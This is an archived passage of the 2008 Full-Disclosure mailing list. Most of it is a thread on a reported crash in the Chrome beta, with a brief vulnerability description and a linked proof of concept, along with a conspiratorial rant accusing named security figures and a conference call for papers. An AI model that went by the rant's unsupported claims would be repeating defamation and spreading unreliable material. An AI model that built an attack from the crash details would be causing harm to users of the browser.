afraid of and Marcus Sachs and whoever he is related to need to be watched closely, I seen that Youtube video as a real threat and i'm keeping a close eye on him and any future dialog he outputs into the security community and wider world. Gadi Evron is small fry in comparison to Marcus Sachs, although Gadi is power hungry and could become a national security threat, he isn't right now, the real concern is that of Marcus Sachs and the Cnet News Youtube clip that mentions he or people he has obviously been having discussions with behind the scenes are wanting to artificially ramp up cyber security in timing with Obama or McCain getting into the White House, either so Marcus Sachs or his associates can A) Grab front focus power for the next four years, B) Get funding for various "projects" they deem as important. When you've got big leaders talking about influencing the next administration as they are coming in to a bunch of folks at Black Hat 2008, it really sends alarm bells ringing, I just hope the guy is being wiretapped. Sure, Gadi Evron is power hungry, but there are bigger fish to fry... Marcus Sachs. http://www.youtube.com/watch?v=FSUPTZVlkyU We need to get the full video of the Youtube video link i've post above put online, does Cnet News have the full video of the presentation? If so post it onto Youtube. Also, if Blackhat.com have the full video of the presentation, please post it online. Can everyone keep an eye on https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html#Sachs and email me when and if the video full appears there, we need to track this guy and keep an eye on him. If I ever get into MI5, i'll be focusing all my efforts on Sachs, so I hope the people who do work in MI5 keep an eye on Sachs in the run up to the election and beyond. Gadi is only causing collateral damage right now, by him pumping out about Estonia and Georgia being blamed on Russia and the news journalists believing that, when really both of those incidents were the work of the U.S government. The other governments can put up with Gadi's bot net claims and what appears in the media because of him, because its not really his fault unless the CIA have leaned on Mossad, to lean on Gadi Evron, to post on the internet who is to blame for Estonia, Georgia and whatever else Sachs and company may have planned to artificially ramp up cyber security as a national security agenda as the next president is coming in, (See Youtube video for Marcus Sachs quotes). All the best, n3td3v From psy.echo at gmail.com Wed Sep 3 00:50:45 2008 From: psy.echo at gmail.com (Rishi Narang) Date: Wed, 3 Sep 2008 05:20:45 +0530 Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <985632087.20080903052045@gmail.com> Hi, --------------------------------------------------- Software: Google Chrome Browser 0.2.149.27 Tested: Windows XP Professional SP3 Result: Google Chrome Crashes with All Tabs Problem: An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It fails in dealing with the POP EBP instruction when pointed out by the EIP register at 0x01002FF4. Proof of Concept: http://evilfingers.com/advisory/google_chrome_poc.php Credit: Rishi Narang (psy.echo) www.greyhat.in www.evilfingers.com --------------------------------------------------- -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. From nick at virus-l.demon.co.uk Wed Sep 3 00:53:41 2008 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Wed, 03 Sep 2008 11:53:41 +1200 Subject: [Full-disclosure] die In-Reply-To: <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <21110.1220379206@turing-police.cc.vt.edu> <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> Message-ID: <48BE7AC5.6973.177F702B@nick.virus-l.demon.co.uk> Dragos Ruiu wrote: > Seriously... with modern multi-paned mail readers, top-posting is a > better way to communicate. That depends on how you define "communicate"... It also assumes that everyone will gladly, sheepfully use "modern, multi- paned mail readers". You may be a sheep whose communications consist of little more than adding simple confirming, negating or further-detail-requesting bleats to others' messages, but "discussion lists" and many other forms of communication commonly engaged via Email by higher order, bi-pedal mammals demand more sophistication of all of the communicator, mail reader and medium... If you dislike "no top posting" because of neanderthals who haven't grokked that it is about better communication and thus mindlessly quote an entire message to add their simple confirming, negating or further- detail-requesting grunts at the bottom, then you are making a false comparison, as such stupidity is equally anti-communication-assisting as your preferred top-bleating approach. Regards, Nick FitzGerald From xploitable at gmail.com Wed Sep 3 01:21:19 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:21:19 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <985632087.20080903052045@gmail.com> References: <985632087.20080903052045@gmail.com> Message-ID: <4b6ee9310809021721r3ee811d1o4c719055f22cac04@mail.gmail.com> On Wed, Sep 3, 2008 at 12:50 AM, Rishi Narang wrote: > > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > You didn't manage to jail break the entire browser, thats whats unique about Chrome, each tab is in jail, so the entire application doesn't crash. The real elite exploits will come with you can jail break the entire Chrome application... "Chrome's architecture lends itself to secure browsing. Each Web page, or tab, runs in its own process, and is blocked from accessing other processes on the computer. "We've taking the existing process boundary," the comic says, "and made it into a jail." Different and more flexible permissions are being developed for plug-ins, however." http://news.cnet.com/8301-17939_109-10029914-2.html From larry at larryseltzer.com Wed Sep 3 01:13:40 2008 From: larry at larryseltzer.com (Larry Seltzer) Date: Tue, 2 Sep 2008 20:13:40 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <985632087.20080903052045@gmail.com> References: <985632087.20080903052045@gmail.com> Message-ID: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Holy crap, a crash bug in a beta browser! Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi Narang Sent: Tuesday, September 02, 2008 7:51 PM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Google Chrome Browser Vulnerability Hi, --------------------------------------------------- Software: Google Chrome Browser 0.2.149.27 Tested: Windows XP Professional SP3 Result: Google Chrome Crashes with All Tabs Problem: An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It fails in dealing with the POP EBP instruction when pointed out by the EIP register at 0x01002FF4. Proof of Concept: http://evilfingers.com/advisory/google_chrome_poc.php Credit: Rishi Narang (psy.echo) www.greyhat.in www.evilfingers.com --------------------------------------------------- -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From psy.echo at gmail.com Wed Sep 3 01:28:59 2008 From: psy.echo at gmail.com (Rishi Narang) Date: Wed, 3 Sep 2008 05:58:59 +0530 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <1337764015.20080903055859@gmail.com> Hello Larry, Ya, a beta browser (though I forgot to mention it) but, is there any product from Google not in Beta ;) Thanks, our searches are not through a beta search engine. Anyways, it's just an attempt to make it a better place to browse and help it come out of Beta. Rest, I very much liked the minimalist approach and simplicity of it + fast surfing speed. Cheers! Just my 2 cents. -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. Wednesday, September 3, 2008, 5:43:40 AM, you wrote: > Holy crap, a crash bug in a beta browser! > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > Narang > Sent: Tuesday, September 02, 2008 7:51 PM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > Hi, > --------------------------------------------------- > Software: > Google Chrome Browser 0.2.149.27 > Tested: > Windows XP Professional SP3 > Result: > Google Chrome Crashes with All Tabs > Problem: > An issue exists in how chrome behaves with undefined-handlers in > chrome.dll version 0.2.149.27. A crash can result without user > interaction. When a user is made to visit a malicious link, which has an > undefined handler followed by a 'special' character, the chrome crashes > with a Google Chrome message window "Whoa! Google Chrome has crashed. > Restart now?". It fails in dealing with the POP EBP instruction when > pointed out by the EIP register at 0x01002FF4. > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > Credit: > Rishi Narang (psy.echo) > www.greyhat.in > www.evilfingers.com > --------------------------------------------------- > -- > Thanks & Regards, > Rishi Narang | Security Researcher > Founder, GREYHAT Insight > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > www.greyhat.in > ... eschew obfuscation, espouse elucidation. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From xploitable at gmail.com Wed Sep 3 01:30:23 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:30:23 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <4b6ee9310809021730o45bc7f9em3af3a34ad10d0b21@mail.gmail.com> On Wed, Sep 3, 2008 at 1:13 AM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser! > Only the current tab I am in, not the entire application. There is also an option to restore the crashed tab after I click on "OK", so none of the data within that tab has been lost. From michaelslists at gmail.com Wed Sep 3 01:35:02 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 10:35:02 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> On Wed, Sep 3, 2008 at 10:13 AM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser! oh fuck off with referring to it as "beta". beta is just a lame tag so you can release something that you don't entirely trust. imho if it's "beta" keep it fucking private. if it's public, grow a set of balls and don't call it "beta" so you can hide behind that when it fails. grow the fuck up, google. > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com -- noon silky http://www.themonkeynet.com/armada/ From michaelslists at gmail.com Wed Sep 3 01:58:01 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 10:58:01 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> Message-ID: <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: > I'd recommend you to read > http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta i'd recommend you re-read my post, and even that link. beta does not go public. and even if you do, don't release something publically only later to claim "oh it wasn't really ready, that's why that's not done". it's just pathetic. can't have it both ways. if you put up, expect to be shot down if there is an angle. -- noon silky http://www.themonkeynet.com/armada/ From xploitable at gmail.com Wed Sep 3 01:59:29 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:59:29 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <1337764015.20080903055859@gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <1337764015.20080903055859@gmail.com> Message-ID: <4b6ee9310809021759p25346452xd9622415c9ee7001@mail.gmail.com> On Wed, Sep 3, 2008 at 1:28 AM, Rishi Narang wrote: > Hello Larry, > > Ya, a beta browser (though I forgot to mention it) but, is there any product from Google not in Beta ;) Thanks, our searches are not through a beta search engine. Anyways, it's just an attempt to make it a better place to browse and help it come out of Beta. > Rest, I very much liked the minimalist approach and simplicity of it + fast surfing speed. Cheers! > > Just my 2 cents. > It didn't break out of jail for me, did it break out of jail for anyone else? All the best, n3td3v From w.jardel at gmail.com Wed Sep 3 01:55:19 2008 From: w.jardel at gmail.com (Jardel Weyrich) Date: Tue, 2 Sep 2008 21:55:19 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> Message-ID: I'd recommend you to read http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta On Tue, Sep 2, 2008 at 9:35 PM, silky wrote: > On Wed, Sep 3, 2008 at 10:13 AM, Larry Seltzer > wrote: > > Holy crap, a crash bug in a beta browser! > > oh fuck off with referring to it as "beta". beta is just a lame tag so > you can release something that you don't entirely trust. > > imho if it's "beta" keep it fucking private. if it's public, grow a > set of balls and don't call it "beta" so you can hide behind that when > it fails. > > grow the fuck up, google. > > > > Larry Seltzer > > eWEEK.com Security Center Editor > > http://security.eweek.com/ > > http://blogs.pcmag.com/securitywatch/ > > Contributing Editor, PC Magazine > > larry.seltzer at ziffdavisenterprise.com > > -- > noon silky > http://www.themonkeynet.com/armada/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/323580cb/attachment.html From cfp at ruxcon.org.au Tue Sep 2 06:14:33 2008 From: cfp at ruxcon.org.au (cfp at ruxcon.org.au) Date: Tue, 2 Sep 2008 05:14:33 +0000 (UTC) Subject: [Full-disclosure] RUXCON 2008 Final Call For Papers Message-ID: <20080902051433.D1CB836F0C5@mail.ruxcon.org.au> RUXCON 2008 FINAL CALL FOR PAPERS Ruxcon would like to announce the final call for papers for the fifth annual Ruxcon conference. This year the conference will take place over the weekend of 29th to the 30th of November. As with previous years, Ruxcon will be held at the University of Technology, Sydney, Australia. The deadline for submissions is the 15th of November. * What is Ruxcon? Ruxcon strives to be Australia's most technical and interesting computer security conference. We're back for the fifth year and intend on bringing you another high quality conference. The conference is held over two days in a relaxed atmosphere, allowing attendees to enjoy themselves whilst expanding their knowledge of security. Live presentations and activities will cover a full range of defensive and offensive security topics, varying from unpublished research to required reading for the public security community. For more information, please visit http://www.ruxcon.org.au * Presentation Information Presentations are set to run for 50 minutes, and will be of a formal nature, with slides and a speech. * Presentation Submissions Ruxcon would like to invite people who are interested in security to submit a presentation. Topics of interest include, but are not limited to: o Code analysis o Exploitation techniques o Network scanning and analysis o Cryptography o Malware Analysis o Reverse engineering o Forensics and Anti-forensics o Social engineering o Web application security o Database security o Legal aspects of computer security and surrounding issues o Law enforcement activities o Telecommunications security (mobile, GSM, VOIP, etc.) Submissions should thoroughly outline your desired presentation subject. Accompanying your submission should be the slides you intend to use or a detailed paper explaining your subject. If you have any enquiries about submissions, or would like to make a submission, please send an e-mail to presentations @ ruxcon dot org dot au The deadline for submissions is the 15th of November. If approved we will additionally require: i. A brief personal biography (between 2-5 paragraphs in length), including: skill set, experience, and credentials. ii. A description on your presentation or workshop (between 2-5 paragraphs in length). * Contact Details Presentation Submissions: presentations @ ruxcon dot org dot au General Enquiries: staff @ ruxcon dot org dot au From xploitable at gmail.com Wed Sep 3 02:13:54 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 02:13:54 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> Message-ID: <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> On Wed, Sep 3, 2008 at 1:58 AM, silky wrote: > On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: >> I'd recommend you to read >> http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta > > i'd recommend you re-read my post, and even that link. > > beta does not go public. and even if you do, don't release something > publically only later to claim "oh it wasn't really ready, that's why > that's not done". it's just pathetic. can't have it both ways. if you > put up, expect to be shot down if there is an angle. > > -- > noon silky > http://www.themonkeynet.com/armada/ > Ok, so can someone answer the question, does this break out of jail, yes or no? -- A security mailing list for computer security news and relevant world news in a breaking news format. https://groups.google.com/group/n3td3v From linux-fan at onda.com.br Wed Sep 3 03:01:24 2008 From: linux-fan at onda.com.br (Giancarlo Razzolini) Date: Tue, 02 Sep 2008 23:01:24 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> Message-ID: <48BDEFF4.4040203@onda.com.br> n3td3v escreveu: > On Wed, Sep 3, 2008 at 1:58 AM, silky wrote: > >> On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: >> >>> I'd recommend you to read >>> http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta >>> >> i'd recommend you re-read my post, and even that link. >> >> beta does not go public. and even if you do, don't release something >> publically only later to claim "oh it wasn't really ready, that's why >> that's not done". it's just pathetic. can't have it both ways. if you >> put up, expect to be shot down if there is an angle. >> >> -- >> noon silky >> http://www.themonkeynet.com/armada/ >> >> > > Ok, so can someone answer the question, does this break out of jail, yes or no? > > Discover it by yourself. Aren't you the bad ass guy of security? Really, i'm tired of seeing netshit just making noise on this list. Also, a bug in a beta browser is just a bug in a beta browser. I won't expect using it in a near future, so i don't care if it has bugs now. My 2 cents, -- Giancarlo Razzolini http://lock.razzolini.adm.br Linux User 172199 Red Hat Certified Engineer no:804006389722501 Verify:https://www.redhat.com/certification/rhce/current/ Moleque Sem Conteudo Numero #002 OpenBSD Stable Ubuntu 8.04 Hardy Heron 4386 2A6F FFD4 4D5F 5842 6EA0 7ABE BBAB 9C0E 6B85 From xploitable at gmail.com Wed Sep 3 03:21:20 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 03:21:20 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <48BDEFF4.4040203@onda.com.br> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> <48BDEFF4.4040203@onda.com.br> Message-ID: <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> On Wed, Sep 3, 2008 at 3:01 AM, Giancarlo Razzolini wrote: > Discover it by yourself. Aren't you the bad ass guy of security? > I'm just a member of the public, unemployed and stupid... maybe you can help me be badass... although i'd rather be a goodass, cause being badass is bad!!! Take care if your security, n3td3v From urlancomp at gmail.com Wed Sep 3 03:28:33 2008 From: urlancomp at gmail.com (Urlan) Date: Tue, 2 Sep 2008 23:28:33 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> <48BDEFF4.4040203@onda.com.br> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> Message-ID: <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> Por que todo esse alvoro?o por causa de um bug na vers?o beta?! Viagem... Urlan On Tue, Sep 2, 2008 at 11:21 PM, n3td3v wrote: > On Wed, Sep 3, 2008 at 3:01 AM, Giancarlo Razzolini > wrote: > > Discover it by yourself. Aren't you the bad ass guy of security? > > > > I'm just a member of the public, unemployed and stupid... maybe you > can help me be badass... although i'd rather be a goodass, cause being > badass is bad!!! > > Take care if your security, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/30b4c0fe/attachment.html From tmdhat at gmail.com Wed Sep 3 04:18:06 2008 From: tmdhat at gmail.com (The Mad Hatter) Date: Wed, 3 Sep 2008 00:18:06 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> Message-ID: <200809030018.07155.tmdhat@gmail.com> On Tuesday 02 September 2008 23:28:33 Urlan wrote: > Por que todo esse alvoro?o por causa de um bug na vers?o beta?! > pt: n?o seja t?o imbecil en: don't be such a moron you are lame twice; first for posting in portuguese, then for giving a stupid negative contribution to the thread. if you don't have shit to say at least don't say shit. -- tmh From nytrokiss at gmail.com Wed Sep 3 05:34:58 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 21:34:58 -0700 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> The same thing happened to safari when it came out on windows. On Tue, Sep 2, 2008 at 5:13 PM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser! > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > Narang > Sent: Tuesday, September 02, 2008 7:51 PM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > > Hi, > > --------------------------------------------------- > Software: > Google Chrome Browser 0.2.149.27 > > Tested: > Windows XP Professional SP3 > > Result: > Google Chrome Crashes with All Tabs > > Problem: > An issue exists in how chrome behaves with undefined-handlers in > chrome.dll version 0.2.149.27. A crash can result without user > interaction. When a user is made to visit a malicious link, which has an > undefined handler followed by a 'special' character, the chrome crashes > with a Google Chrome message window "Whoa! Google Chrome has crashed. > Restart now?". It fails in dealing with the POP EBP instruction when > pointed out by the EIP register at 0x01002FF4. > > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > > Credit: > Rishi Narang (psy.echo) > www.greyhat.in > www.evilfingers.com > --------------------------------------------------- > > -- > Thanks & Regards, > Rishi Narang | Security Researcher > Founder, GREYHAT Insight > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > www.greyhat.in > > ... eschew obfuscation, espouse elucidation. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/326e4dbc/attachment.html From fergdawg at netzero.net Wed Sep 3 05:48:18 2008 From: fergdawg at netzero.net (Paul Ferguson) Date: Wed, 3 Sep 2008 04:48:18 GMT Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080902.214818.9950.0@webmail15.vgs.untd.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- "James Matthews" wrote: > The same thing happened to safari when it came out on windows. Well, no kidding. :-) Maybe the flaws that will hound Chrome are due to the fact that it uses Safari as a codebase? See also: http://raffon.net/research/google/chrome/carpet.html http://www.microsoft.com/technet/security/advisory/953818.mspx Enjoy. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.3 (Build 3017) wj8DBQFIvhcOq1pz9mNUZTMRAstlAKCPqFEaeSc96HHG1gyL5+EbgAYEQACdHBIK kZWN+fHmLdspT7LNmS8Ey08= =fvYJ -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ From andfarm at gmail.com Wed Sep 3 08:09:56 2008 From: andfarm at gmail.com (Andrew Farmer) Date: Wed, 3 Sep 2008 00:09:56 -0700 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080902.214818.9950.0@webmail15.vgs.untd.com> References: <20080902.214818.9950.0@webmail15.vgs.untd.com> Message-ID: <125874D1-5583-4D90-BCF9-954613A83EC1@gmail.com> On 02 Sep 08, at 21:48, Paul Ferguson wrote: > - -- "James Matthews" wrote: >> The same thing happened to safari when it came out on windows. > > Well, no kidding. :-) > > Maybe the flaws that will hound Chrome are due to the fact that > it uses Safari as a codebase? WebKit != Safari. Security-related bugs in rendering engines are pretty uncommon. From fergdawg at netzero.net Wed Sep 3 08:37:06 2008 From: fergdawg at netzero.net (Paul Ferguson) Date: Wed, 3 Sep 2008 07:37:06 GMT Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080903.003706.20417.1@webmail08.vgs.untd.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- Andrew Farmer wrote: >On 02 Sep 08, at 21:48, Paul Ferguson wrote: >> - -- "James Matthews" wrote: >>> The same thing happened to safari when it came out on windows. >> >> Well, no kidding. :-) >> >> Maybe the flaws that will hound Chrome are due to the fact that >> it uses Safari as a codebase? > >WebKit != Safari. Security-related bugs in rendering engines are pretty uncommon. > Okay, well you cannot deny this is a lackluster starting point. I hope Google can use this inauspicious starting point to build the advertising empire they desire. I for one do not welcome the advertisement overlords. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.3 (Build 3017) wj8DBQFIvj6aq1pz9mNUZTMRAgEKAKC8rCgCiSPDcSLX8sAe1/ZJRR4fDACeIq9x X1b4Rd9bxRevUo78azKBi5o= =ic8T -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ From michaelslists at gmail.com Wed Sep 3 08:52:49 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 17:52:49 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080903.003706.20417.1@webmail08.vgs.untd.com> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> Message-ID: <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> On Wed, Sep 3, 2008 at 5:37 PM, Paul Ferguson wrote: > Okay, well you cannot deny this is a lackluster starting point. > > I hope Google can use this inauspicious starting point to build > the advertising empire they desire. > > I for one do not welcome the advertisement overlords. you're not the only one; don't worry. > - - ferg > > -----BEGIN PGP SIGNATURE----- > Version: PGP Desktop 9.6.3 (Build 3017) > > wj8DBQFIvj6aq1pz9mNUZTMRAgEKAKC8rCgCiSPDcSLX8sAe1/ZJRR4fDACeIq9x > X1b4Rd9bxRevUo78azKBi5o= > =ic8T > -----END PGP SIGNATURE----- > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawg(at)netzero.net > ferg's tech blog: http://fergdawg.blogspot.com/ -- noon silky http://www.themonkeynet.com/armada/ From xploitable at gmail.com Wed Sep 3 10:04:43 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 10:04:43 +0100 Subject: [Full-disclosure] Google Chrome Browser 